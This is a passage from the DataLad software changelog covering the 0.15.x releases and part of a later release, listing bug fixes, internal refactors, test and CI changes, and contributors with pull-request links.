customization\n possibilities\n `#6391 <https://github.com/datalad/datalad/pull/6391>`__ (by @mih)\n- ``--since=^`` mode of operation of ``create-sibling`` is documented\n now `#6436 <https://github.com/datalad/datalad/pull/6436>`__ (by\n @yarikoptic)\n\n.. _internal-12:\n\nInternal\n--------\n\n- The internal ``status()`` helper was equipped with docstrings and\n promotes “breadth-first” reporting with a new parameter\n ``reporting_order``\n `#6006 <https://github.com/datalad/datalad/pull/6006>`__ (by @mih)\n- ``AnnexRepo.get_file_annexinfo()`` is introduced for more convenient\n queries for single files and replaces a now deprecated\n ``AnnexRepo.get_file_key()`` to receive information with fewer calls\n to Git `#6104 <https://github.com/datalad/datalad/pull/6104>`__ (by\n @mih)\n- A new ``get_paths_by_ds()`` helper exposes ``status``\\ ’ path\n normalization and sorting\n `#6110 <https://github.com/datalad/datalad/pull/6110>`__ (by @mih)\n- ``status`` is optimized with a cache for dataset roots\n `#6137 <https://github.com/datalad/datalad/pull/6137>`__ (by\n @yarikoptic)\n- The internal ``get_func_args_doc()`` helper with Python 2 is removed\n from DataLad core\n `#6175 <https://github.com/datalad/datalad/pull/6175>`__ (by\n @yarikoptic)\n- Further restructuring of the source tree to better reflect the\n internal dependency structure of the code: ``AddArchiveContent`` is\n moved from ``datalad/interface`` to ``datalad/local``\n (`#6188 <https://github.com/datalad/datalad/pull/6188>`__ (by @mih)),\n ``Clean`` is moved from ``datalad/interface`` to ``datalad/local``\n (`#6191 <https://github.com/datalad/datalad/pull/6191>`__ (by @mih)),\n ``Unlock`` is moved from ``datalad/interface`` to ``datalad/local``\n (`#6192 <https://github.com/datalad/datalad/pull/6192>`__ (by @mih)),\n ``DownloadURL`` is moved from ``datalad/interface`` to\n ``datalad/local``\n (`#6217 <https://github.com/datalad/datalad/pull/6217>`__ (by @mih)),\n ``Rerun`` is moved from ``datalad/interface`` to ``datalad/local``\n (`#6220 <https://github.com/datalad/datalad/pull/6220>`__ (by @mih)),\n ``RunProcedure`` is moved from ``datalad/interface`` to\n ``datalad/local``\n (`#6222 <https://github.com/datalad/datalad/pull/6222>`__ (by @mih)).\n The interface command list is restructured and resorted\n `#6223 <https://github.com/datalad/datalad/pull/6223>`__ (by @mih)\n- ``wrapt`` is replaced with functools’ ``wraps``\n `#6190 <https://github.com/datalad/datalad/pull/6190>`__ (by\n @yariktopic)\n- The unmaintained ``appdirs`` library has been replaced with\n ``platformdirs``\n `#6198 <https://github.com/datalad/datalad/pull/6198>`__ (by @adswa)\n- Modelines mismatching the code style in source files were fixed\n `#6263 <https://github.com/datalad/datalad/pull/6263>`__ (by @AKSoo)\n- ``datalad/__init__.py`` has been cleaned up\n `#6271 <https://github.com/datalad/datalad/pull/6271>`__ (by @mih)\n- ``GitRepo.call_git_items`` is implemented with a generator-based\n runner `#6278 <https://github.com/datalad/datalad/pull/6278>`__ (by\n @christian-monch)\n- Separate positional from keyword arguments in the Python API to match\n CLI with ``*``\n `#6176 <https://github.com/datalad/datalad/pull/6176>`__ (by\n @yarikoptic),\n `#6304 <https://github.com/datalad/datalad/pull/6304>`__ (by\n @christian-monch)\n- ``GitRepo.bare`` does not require the ConfigManager anymore\n `#6323 <https://github.com/datalad/datalad/pull/6323>`__ (by @mih)\n- ``_get_dot_git()`` was reimplemented to be more efficient and\n consistent, by testing for common 
scenarios first and introducing a\n consistently applied ``resolved`` flag for result path reporting\n `#6325 <https://github.com/datalad/datalad/pull/6325>`__ (by @mih)\n- All data files under ``datalad`` are now included when installing\n DataLad `#6336 <https://github.com/datalad/datalad/pull/6336>`__ (by\n @jwodder)\n- Add internal method for non-interactive provider/credential storing\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- Allow credential classes to have a context set, consisting of a URL\n they are to be used with and a dataset DataLad is operating on,\n allowing to consider “local” and “dataset” config locations\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- The Interface method ``get_refds_path()`` was deprecated\n `#6387 <https://github.com/datalad/datalad/pull/6387>`__ (by @adswa)\n- ``datalad.interface.base.Interface`` is now an abstract class\n `#6391 <https://github.com/datalad/datalad/pull/6391>`__ (by @mih)\n- Simplified the decision making for result rendering, and reduced code\n complexity `#6394 <https://github.com/datalad/datalad/pull/6394>`__\n (by @mih)\n- Reduce code duplication in ``datalad.support.json_py``\n `#6398 <https://github.com/datalad/datalad/pull/6398>`__ (by @mih)\n- Use public ``ArgumentParser.parse_known_args`` instead of protected\n ``_parse_known_args``\n `#6414 <https://github.com/datalad/datalad/pull/6414>`__ (by\n @yarikoptic)\n- ``add-archive-content`` does not rely on the deprecated\n ``tempfile.mktemp`` anymore, but uses the more secure\n ``tempfile.mkdtemp``\n `#6428 <https://github.com/datalad/datalad/pull/6428>`__ (by @adswa)\n- AnnexRepo’s internal ``annexstatus`` is deprecated. In its place, a\n new test helper assists the few tests that rely on it\n `#6413 <https://github.com/datalad/datalad/pull/6413>`__ (by @adswa)\n- ``config`` has been refactored from ``where[=\"dataset\"]`` to\n ``scope[=\"branch\"]``\n `#5969 <https://github.com/datalad/datalad/pull/5969>`__ (by\n @yarikoptic)\n- Common command arguments are now uniformly and exhaustively passed to\n result renderers and filters for decision making. Previously, the\n presence of a particular argument depended on the respective API and\n circumstances of a command call.\n `#6440 <https://github.com/datalad/datalad/pull/6440>`__ (by @mih)\n- Entrypoint processing for extensions and metadata extractors has been\n consolidated on a uniform helper that is about twice as fast as the\n previous implementations.\n `#6591 <https://github.com/datalad/datalad/pull/6591>`__ (by @mih)\n\n.. 
_tests-14:\n\nTests\n-----\n\n- A range of Windows tests pass and were enabled\n `#6136 <https://github.com/datalad/datalad/pull/6136>`__ (by @adswa)\n- Invalid escape sequences in some tests were fixed\n `#6147 <https://github.com/datalad/datalad/pull/6147>`__ (by @mih)\n- A cross-platform compatible HTTP-serving test environment is\n introduced `#6153 <https://github.com/datalad/datalad/pull/6153>`__\n (by @mih)\n- A new helper exposes ``serve_path_via_http`` to the command line to\n deploy an ad-hoc instance of the HTTP server used for internal\n testing, with SSL and auth, if desired.\n `#6169 <https://github.com/datalad/datalad/pull/6169>`__ (by @mih)\n- Windows tests were redistributed across worker runs to harmonize\n runtime `#6200 <https://github.com/datalad/datalad/pull/6200>`__ (by\n @adswa)\n- ``Batchedcommand`` gained a basic test\n `#6203 <https://github.com/datalad/datalad/pull/6203>`__ (by\n @christian-monch)\n- The use of ``with_testrepo`` is discontinued in all core tests\n `#6224 <https://github.com/datalad/datalad/pull/6224>`__ (by @mih)\n- The new ``git-annex.filter.annex.process`` configuration is enabled\n by default on Windows to speed up the test suite\n `#6245 <https://github.com/datalad/datalad/pull/6245>`__ (by @mih)\n- If the available Git version supports it, the test suite now uses\n ``GIT_CONFIG_GLOBAL`` to configure a fake home directory instead of\n overwriting ``HOME`` on OSX\n (`#6251 <https://github.com/datalad/datalad/pull/6251>`__ (by\n @bpoldrack)) and ``HOME`` and ``USERPROFILE`` on Windows\n `#6260 <https://github.com/datalad/datalad/pull/6260>`__ (by @adswa)\n- Windows test timeouts of runners were addressed\n `#6311 <https://github.com/datalad/datalad/pull/6311>`__ (by\n @christian-monch)\n- A handful of Windows tests were fixed\n (`#6352 <https://github.com/datalad/datalad/pull/6352>`__ (by\n @yarikoptic)) or disabled\n (`#6353 <https://github.com/datalad/datalad/pull/6353>`__ (by\n @yarikoptic))\n- ``download-url``\\ ’s test under ``http_proxy`` are skipped when a\n session can’t be established\n `#6361 <https://github.com/datalad/datalad/pull/6361>`__ (by\n @yarikoptic)\n- A test for ``datalad clean`` was fixed to be invoked within a dataset\n `#6359 <https://github.com/datalad/datalad/pull/6359>`__ (by\n @yarikoptic)\n- The new datalad.cli.tests have an improved module coverage of 80%\n `#6378 <https://github.com/datalad/datalad/pull/6378>`__ (by @mih)\n- The ``test_source_candidate_subdataset`` has been marked as ``@slow``\n `#6429 <https://github.com/datalad/datalad/pull/6429>`__ (by\n @yarikoptic)\n- Dedicated ``CLI`` benchmarks exist now\n `#6381 <https://github.com/datalad/datalad/pull/6381>`__ (by @mih)\n- Enable code coverage report for subprocesses\n `#6546 <https://github.com/datalad/datalad/pull/6546>`__ (by @adswa)\n- Skip a test on annex>=10.20220127 due to a bug in annex. 
See\n https://git-annex.branchable.com/bugs/Change_to_annex.largefiles_leaves_repo_modified/\n\nInfra\n-----\n\n- A new issue template using GitHub forms prestructures bug reports\n `#6048 <https://github.com/datalad/datalad/pull/6048>`__ (by\n @Remi-Gau)\n- DataLad and its dependency stack were packaged for Gentoo Linux\n `#6088 <https://github.com/datalad/datalad/pull/6088>`__ (by\n @TheChymera)\n- The readthedocs configuration is modernized to version 2\n `#6207 <https://github.com/datalad/datalad/pull/6207>`__ (by @adswa)\n- The Windows CI setup now runs on Appveyor’s Visual Studio 2022\n configuration\n `#6228 <https://github.com/datalad/datalad/pull/6228>`__ (by @adswa)\n- The ``readthedocs-theme`` and ``Sphinx`` versions were pinned to\n re-enable rendering of bullet points in the documentation\n `#6346 <https://github.com/datalad/datalad/pull/6346>`__ (by @adswa)\n- The PR template was updated with a CHANGELOG template. Future PRs\n should use it to include a summary for the CHANGELOG\n `#6396 <https://github.com/datalad/datalad/pull/6396>`__ (by @mih)\n\nAuthors: 11\n-----------\n\n- Michael Hanke (@mih)\n- Yaroslav Halchenko (@yarikoptic)\n- Adina Wagner (@adswa)\n- Remi Gau (@Remi-Gau)\n- Horea Christian (@TheChymera)\n- Micha Szczepanik (@mslw)\n- Christian Mnch (@christian-monch)\n- John T. Wodder (@jwodder)\n- Benjamin Poldrack (@bpoldrack)\n- Sin Kim (@AKSoo)\n- Basile Pinsard (@bpinsard)\n\n--------------\n\n0.15.6 (Sun Feb 27 2022)\n========================\n\n.. _bug-fix-11:\n\nBug Fix\n-------\n\n- BF: do not use BaseDownloader instance wide InterProcessLock -\n resolves stalling or errors during parallel installs\n `#6507 <https://github.com/datalad/datalad/pull/6507>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- release workflow: add -vv to auto invocation\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Fix version incorrectly incremented by release process in CHANGELOGs\n `#6459 <https://github.com/datalad/datalad/pull/6459>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): add another condition to skip under http_proxy set\n `#6459 <https://github.com/datalad/datalad/pull/6459>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-1-1:\n\nAuthors: 1\n----------\n\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.5 (Wed Feb 09 2022)\n========================\n\nEnhancement\n-----------\n\n- BF: When download-url gets Pathobject as path convert it to a string\n `#6364 <https://github.com/datalad/datalad/pull/6364>`__\n (`@adswa <https://github.com/adswa>`__)\n\n.. 
_bug-fix-12:\n\nBug Fix\n-------\n\n- Fix AnnexRepo.whereis key=True mode operation, and add batch mode\n support `#6379 <https://github.com/datalad/datalad/pull/6379>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: run - adjust description for -i/-o to mention that it could be a\n directory `#6416 <https://github.com/datalad/datalad/pull/6416>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: ORA over HTTP tried to check archive\n `#6355 <https://github.com/datalad/datalad/pull/6355>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: condition access to isatty to have stream eval to True\n `#6360 <https://github.com/datalad/datalad/pull/6360>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: python 3.10 compatibility fixes\n `#6363 <https://github.com/datalad/datalad/pull/6363>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Remove two(!) copies of a test\n `#6374 <https://github.com/datalad/datalad/pull/6374>`__\n (`@mih <https://github.com/mih>`__)\n- Warn just once about incomplete git config\n `#6343 <https://github.com/datalad/datalad/pull/6343>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Make version detection robust to GIT_DIR specification\n `#6341 <https://github.com/datalad/datalad/pull/6341>`__\n (`@effigies <https://github.com/effigies>`__\n `@mih <https://github.com/mih>`__)\n- BF(Q&D): do not crash - issue warning - if template fails to format\n `#6319 <https://github.com/datalad/datalad/pull/6319>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-5-3:\n\nAuthors: 5\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Chris Markiewicz (`@effigies <https://github.com/effigies>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.4 (Thu Dec 16 2021)\n========================\n\n.. 
_bug-fix-13:\n\nBug Fix\n-------\n\n- BF: autorc - replace incorrect releaseTypes with “none”\n `#6320 <https://github.com/datalad/datalad/pull/6320>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Minor enhancement to CONTRIBUTING.md\n `#6309 <https://github.com/datalad/datalad/pull/6309>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n- UX: If a clean repo is dirty after a failed run, give clean-up hints\n `#6112 <https://github.com/datalad/datalad/pull/6112>`__\n (`@adswa <https://github.com/adswa>`__)\n- Stop using distutils\n `#6113 <https://github.com/datalad/datalad/pull/6113>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- BF: RIARemote - set UI backend to annex to make it interactive\n `#6287 <https://github.com/datalad/datalad/pull/6287>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__\n `@bpoldrack <https://github.com/bpoldrack>`__)\n- Fix invalid escape sequences\n `#6293 <https://github.com/datalad/datalad/pull/6293>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- CI: Update environment for windows CI builds\n `#6292 <https://github.com/datalad/datalad/pull/6292>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n- bump the python version used for mac os tests\n `#6288 <https://github.com/datalad/datalad/pull/6288>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@bpoldrack <https://github.com/bpoldrack>`__)\n- ENH(UX): log a hint to use ulimit command in case of “Too long”\n exception `#6173 <https://github.com/datalad/datalad/pull/6173>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Report correct HTTP URL for RIA store content\n `#6091 <https://github.com/datalad/datalad/pull/6091>`__\n (`@mih <https://github.com/mih>`__)\n- BF: Don’t overwrite subdataset source candidates\n `#6168 <https://github.com/datalad/datalad/pull/6168>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Bump sphinx requirement to bypass readthedocs defaults\n `#6189 <https://github.com/datalad/datalad/pull/6189>`__\n (`@mih <https://github.com/mih>`__)\n- infra: Provide custom prefix to auto-related labels\n `#6151 <https://github.com/datalad/datalad/pull/6151>`__\n (`@adswa <https://github.com/adswa>`__)\n- Remove all usage of exc_str()\n `#6142 <https://github.com/datalad/datalad/pull/6142>`__\n (`@mih <https://github.com/mih>`__)\n- BF: obtain information about annex special remotes also from annex\n journal `#6135 <https://github.com/datalad/datalad/pull/6135>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__\n `@mih <https://github.com/mih>`__)\n- BF: clone tried to save new subdataset despite failing to clone\n `#6140 <https://github.com/datalad/datalad/pull/6140>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _tests-15:\n\nTests\n-----\n\n- RF+BF: use skip_if_no_module helper instead of try/except for libxmp\n and boto `#6148 <https://github.com/datalad/datalad/pull/6148>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- git://github.com -> https://github.com\n `#6134 <https://github.com/datalad/datalad/pull/6134>`__\n (`@mih <https://github.com/mih>`__)\n\nAuthors: 6\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. 
Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.3 (Sat Oct 30 2021)\n========================\n\n.. _bug-fix-14:\n\nBug Fix\n-------\n\n- BF: Don’t make create-sibling recursive by default\n `#6116 <https://github.com/datalad/datalad/pull/6116>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: Add dashes to ‘force’ option in non-empty directory error message\n `#6078 <https://github.com/datalad/datalad/pull/6078>`__\n (`@DisasterMo <https://github.com/DisasterMo>`__)\n- DOC: Add supported URL types to download-url’s docstring\n `#6098 <https://github.com/datalad/datalad/pull/6098>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: Retain git-annex error messages & don’t show them if operation\n successful `#6070 <https://github.com/datalad/datalad/pull/6070>`__\n (`@DisasterMo <https://github.com/DisasterMo>`__)\n- Remove uses of ``__full_version__`` and ``datalad.version``\n `#6073 <https://github.com/datalad/datalad/pull/6073>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- BF: ORA shouldn’t crash while handling a failure\n `#6063 <https://github.com/datalad/datalad/pull/6063>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n- DOC: Refine –reckless docstring on usage and wording\n `#6043 <https://github.com/datalad/datalad/pull/6043>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: archives upon strip - use rmtree which retries etc instead of\n rmdir `#6064 <https://github.com/datalad/datalad/pull/6064>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: do not leave test in a tmp dir destined for removal\n `#6059 <https://github.com/datalad/datalad/pull/6059>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Next wave of exc_str() removals\n `#6022 <https://github.com/datalad/datalad/pull/6022>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _pushed-to-maint-3:\n\nPushed to ``maint``\n-------------------\n\n- CI: Enable new codecov uploader in Appveyor CI\n (`@adswa <https://github.com/adswa>`__)\n\n.. _internal-13:\n\nInternal\n--------\n\n- UX: Log clone-candidate number and URLs\n `#6092 <https://github.com/datalad/datalad/pull/6092>`__\n (`@adswa <https://github.com/adswa>`__)\n- UX/ENH: Disable reporting, and don’t do superfluous internal\n subdatasets calls\n `#6094 <https://github.com/datalad/datalad/pull/6094>`__\n (`@adswa <https://github.com/adswa>`__)\n- Update codecov action to v2\n `#6072 <https://github.com/datalad/datalad/pull/6072>`__\n (`@jwodder <https://github.com/jwodder>`__)\n\n.. _documentation-11:\n\nDocumentation\n-------------\n\n- Design document on URL substitution feature\n `#6065 <https://github.com/datalad/datalad/pull/6065>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _tests-16:\n\nTests\n-----\n\n- BF(TST): remove reuse of the same tape across unrelated tests\n `#6127 <https://github.com/datalad/datalad/pull/6127>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Fail Travis tests on deprecation warnings\n `#6074 <https://github.com/datalad/datalad/pull/6074>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Ux get result handling broken\n `#6052 <https://github.com/datalad/datalad/pull/6052>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- enable metalad tests again\n `#6060 <https://github.com/datalad/datalad/pull/6060>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n\n.. 
_authors-7-1:\n\nAuthors: 7\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Burgardt (`@DisasterMo <https://github.com/DisasterMo>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.2 (Wed Oct 06 2021)\n========================\n\n.. _bug-fix-15:\n\nBug Fix\n-------\n\n- BF: Don’t suppress datalad subdatasets output\n `#6035 <https://github.com/datalad/datalad/pull/6035>`__\n (`@DisasterMo <https://github.com/DisasterMo>`__\n `@mih <https://github.com/mih>`__)\n- Honor datalad.runtime.use-patool if set regardless of OS (was Windows\n only) `#6033 <https://github.com/datalad/datalad/pull/6033>`__\n (`@mih <https://github.com/mih>`__)\n- Discontinue usage of deprecated (public) helper\n `#6032 <https://github.com/datalad/datalad/pull/6032>`__\n (`@mih <https://github.com/mih>`__)\n- BF: ProgressHandler - close the other handler if was specified\n `#6020 <https://github.com/datalad/datalad/pull/6020>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- UX: Report GitLab weburl of freshly created projects in the result\n `#6017 <https://github.com/datalad/datalad/pull/6017>`__\n (`@adswa <https://github.com/adswa>`__)\n- Ensure there’s a blank line between the class ``__doc__`` and\n “Parameters” in ``build_doc`` docstrings\n `#6004 <https://github.com/datalad/datalad/pull/6004>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Large code-reorganization of everything runner-related\n `#6008 <https://github.com/datalad/datalad/pull/6008>`__\n (`@mih <https://github.com/mih>`__)\n- Discontinue exc_str() in all modern parts of the code base\n `#6007 <https://github.com/datalad/datalad/pull/6007>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _tests-17:\n\nTests\n-----\n\n- TST: Add test to ensure functionality with subdatasets starting with\n a hyphen (-) `#6042 <https://github.com/datalad/datalad/pull/6042>`__\n (`@DisasterMo <https://github.com/DisasterMo>`__)\n- BF(TST): filter away warning from coverage from analysis of stderr of\n –help `#6028 <https://github.com/datalad/datalad/pull/6028>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: disable outdated SSL root certificate breaking chain on\n older/buggy clients\n `#6027 <https://github.com/datalad/datalad/pull/6027>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: start global test_http_server only if not running already\n `#6023 <https://github.com/datalad/datalad/pull/6023>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-5-4:\n\nAuthors: 5\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Burgardt (`@DisasterMo <https://github.com/DisasterMo>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.1 (Fri Sep 24 2021)\n========================\n\n.. 
_bug-fix-16:\n\nBug Fix\n-------\n\n- BF: downloader - fail to download even on non-crippled FS if symlink\n exists `#5991 <https://github.com/datalad/datalad/pull/5991>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: import datalad.api to bind extensions methods for discovery of\n dataset methods\n `#5999 <https://github.com/datalad/datalad/pull/5999>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Restructure cmdline API presentation\n `#5988 <https://github.com/datalad/datalad/pull/5988>`__\n (`@mih <https://github.com/mih>`__)\n- Close file descriptors after process exit\n `#5983 <https://github.com/datalad/datalad/pull/5983>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _pushed-to-maint-4:\n\nPushed to ``maint``\n-------------------\n\n- Discontinue testing of hirni extension\n (`@mih <https://github.com/mih>`__)\n\n.. _internal-14:\n\nInternal\n--------\n\n- Add debugging information to release step\n `#5980 <https://github.com/datalad/datalad/pull/5980>`__\n (`@jwodder <https://github.com/jwodder>`__)\n\n.. _documentation-12:\n\nDocumentation\n-------------\n\n- Coarse description of the credential subsystem’s functionality\n `#5998 <https://github.com/datalad/datalad/pull/5998>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _tests-18:\n\nTests\n-----\n\n- BF(TST): use sys.executable, mark test_ria_basics.test_url_keys as\n requiring network\n `#5986 <https://github.com/datalad/datalad/pull/5986>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-3-5:\n\nAuthors: 3\n----------\n\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.0 (Tue Sep 14 2021) – We miss you Kyle!\n============================================\n\n.. _enhancements-and-new-features-5:\n\nEnhancements and new features\n-----------------------------\n\n- Command execution is now performed by a new ``Runner`` implementation\n that is no longer based on the ``asyncio`` framework, which was found\n to exhibit fragile performance in interaction with other\n ``asyncio``-using code, such as Jupyter notebooks. The new\n implementation is based on threads. It also supports the\n specification of “protocols” that were introduced with the switch to\n the ``asyncio`` implementation in 0.14.0.\n (`#5667 <https://github.com/datalad/datalad/issues/5667>`__)\n\n- ``clone`` now supports arbitrary URL transformations based on regular\n expressions. One or more transformation steps can be defined via\n ``datalad.clone.url-substitute.<label>`` configuration settings. The\n feature can be (and is now) used to support convenience mappings,\n such as ``https://osf.io/q8xnk/`` (displayed in a browser window) to\n ``osf://q8xnk`` (clonable via the ``datalad-osf`` extension).\n (`#5749 <https://github.com/datalad/datalad/issues/5749>`__)\n\n- Homogenize SSH use and configurability between DataLad and git-annex,\n by instructing git-annex to use DataLad’s ``sshrun`` for SSH calls\n (instead of SSH directly).\n (`#5389 <https://github.com/datalad/datalad/issues/5389>`__)\n\n- The ORA special remote has received several new features:\n\n - It now supports a ``push-url`` setting as an alternative to ``url``\n for write access. 
An analog parameter was also added to\n ``create-sibling-ria``.\n (`#5420 <https://github.com/datalad/datalad/issues/5420>`__,\n `#5428 <https://github.com/datalad/datalad/issues/5428>`__)\n\n - Access of RIA stores now performs homogeneous availability checks,\n regardless of access protocol. Before, broken HTTP-based access\n due to misspecified URLs could have gone unnoticed.\n (`#5459 <https://github.com/datalad/datalad/issues/5459>`__,\n `#5672 <https://github.com/datalad/datalad/issues/5672>`__)\n\n - Error reporting was introduced to inform about undesirable\n conditions in remote RIA stores.\n (`#5683 <https://github.com/datalad/datalad/issues/5683>`__)\n\n- ``create-sibling-ria`` now supports ``--alias`` for the specification\n of a convenience dataset alias name in a RIA store.\n (`#5592 <https://github.com/datalad/datalad/issues/5592>`__)\n\n- Analog to ``git commit``, ``save`` now features an ``--amend`` mode\n to support incremental updates of a dataset state.\n (`#5430 <https://github.com/datalad/datalad/issues/5430>`__)\n\n- ``run`` now supports a dry-run mode that can be used to inspect the\n result of parameter expansion on the effective command to ease the\n composition of more complicated command lines.\n (`#5539 <https://github.com/datalad/datalad/issues/5539>`__)\n\n- ``run`` now supports a ``--assume-ready`` switch to avoid the\n (possibly expensive) preparation of inputs and outputs with large\n datasets that have already been readied through other means.\n (`#5431 <https://github.com/datalad/datalad/issues/5431>`__)\n\n- ``update`` now features ``--how`` and ``--how-subds`` parameters to\n configure how an update shall be performed. Supported modes are\n ``fetch`` (unchanged default), and ``merge`` (previously also\n possible via ``--merge``), but also new strategies like ``reset`` or\n ``checkout``.\n (`#5534 <https://github.com/datalad/datalad/issues/5534>`__)\n\n- ``update`` has a new ``--follow=parentds-lazy`` mode that only\n performs a fetch operation in subdatasets when the desired commit is\n not yet present. During recursive updates involving many subdatasets\n this can substantially speed up performance.\n (`#5474 <https://github.com/datalad/datalad/issues/5474>`__)\n\n- DataLad’s command line API can now report the version for individual\n commands via ``datalad <cmd> --version``. The output has been\n homogenized to ``<providing package> <version>``.\n (`#5543 <https://github.com/datalad/datalad/issues/5543>`__)\n\n- ``create-sibling`` now logs information on an auto-generated sibling\n name, in the case that no ``--name/-s`` was provided.\n (`#5550 <https://github.com/datalad/datalad/issues/5550>`__)\n\n- ``create-sibling-github`` has been updated to emit result records\n like any standard DataLad command. Previously it was implemented as a\n “plugin”, which did not support all standard API parameters.\n (`#5551 <https://github.com/datalad/datalad/issues/5551>`__)\n\n- ``copy-file`` now also works with content-less files in datasets on\n crippled filesystems (adjusted mode), when a recent enough git-annex\n (8.20210428 or later) is available.\n (`#5630 <https://github.com/datalad/datalad/issues/5630>`__)\n\n- ``addurls`` can now be instructed how to behave in the event of file\n name collision via a new parameter ``--on-collision``.\n (`#5675 <https://github.com/datalad/datalad/issues/5675>`__)\n\n- ``addurls`` reporting now informs which particular subdatasets were\n created. 
(`#5689 <https://github.com/datalad/datalad/issues/5689>`__)\n\n- Credentials can now be provided or overwritten via all means\n supported by ``ConfigManager``. Importantly,\n ``datalad.credential.<name>.<field>`` configuration settings and\n analog specification via environment variables are now supported\n (rather than custom environment variables only). Previous\n specification methods are still supported too; a configuration sketch\n follows this list.\n (`#5680 <https://github.com/datalad/datalad/issues/5680>`__)\n\n- A new ``datalad.credentials.force-ask`` configuration flag can now be\n used to force re-entry of already known credentials. This simplifies\n credential updates without having to use an approach native to\n individual credential stores.\n (`#5777 <https://github.com/datalad/datalad/issues/5777>`__)\n\n- Suppression of rendering repeated similar results is now configurable\n via the configuration switches\n ``datalad.ui.suppress-similar-results`` (bool), and\n ``datalad.ui.suppress-similar-results-threshold`` (int).\n (`#5681 <https://github.com/datalad/datalad/issues/5681>`__)\n\n- The performance of ``status`` and similar functionality when\n determining local file availability has been improved.\n (`#5692 <https://github.com/datalad/datalad/issues/5692>`__)\n\n- ``push`` now renders a result summary on completion.\n (`#5696 <https://github.com/datalad/datalad/issues/5696>`__)\n\n- A dedicated info log message indicates when dataset repositories are\n subjected to an annex version upgrade.\n (`#5698 <https://github.com/datalad/datalad/issues/5698>`__)\n\n- Error reporting improvements:\n\n - The ``NoDatasetFound`` exception now provides information for\n which purpose a dataset is required.\n (`#5708 <https://github.com/datalad/datalad/issues/5708>`__)\n\n - Wording of the ``MissingExternalDependency`` error was rephrased to\n account for cases of non-functional 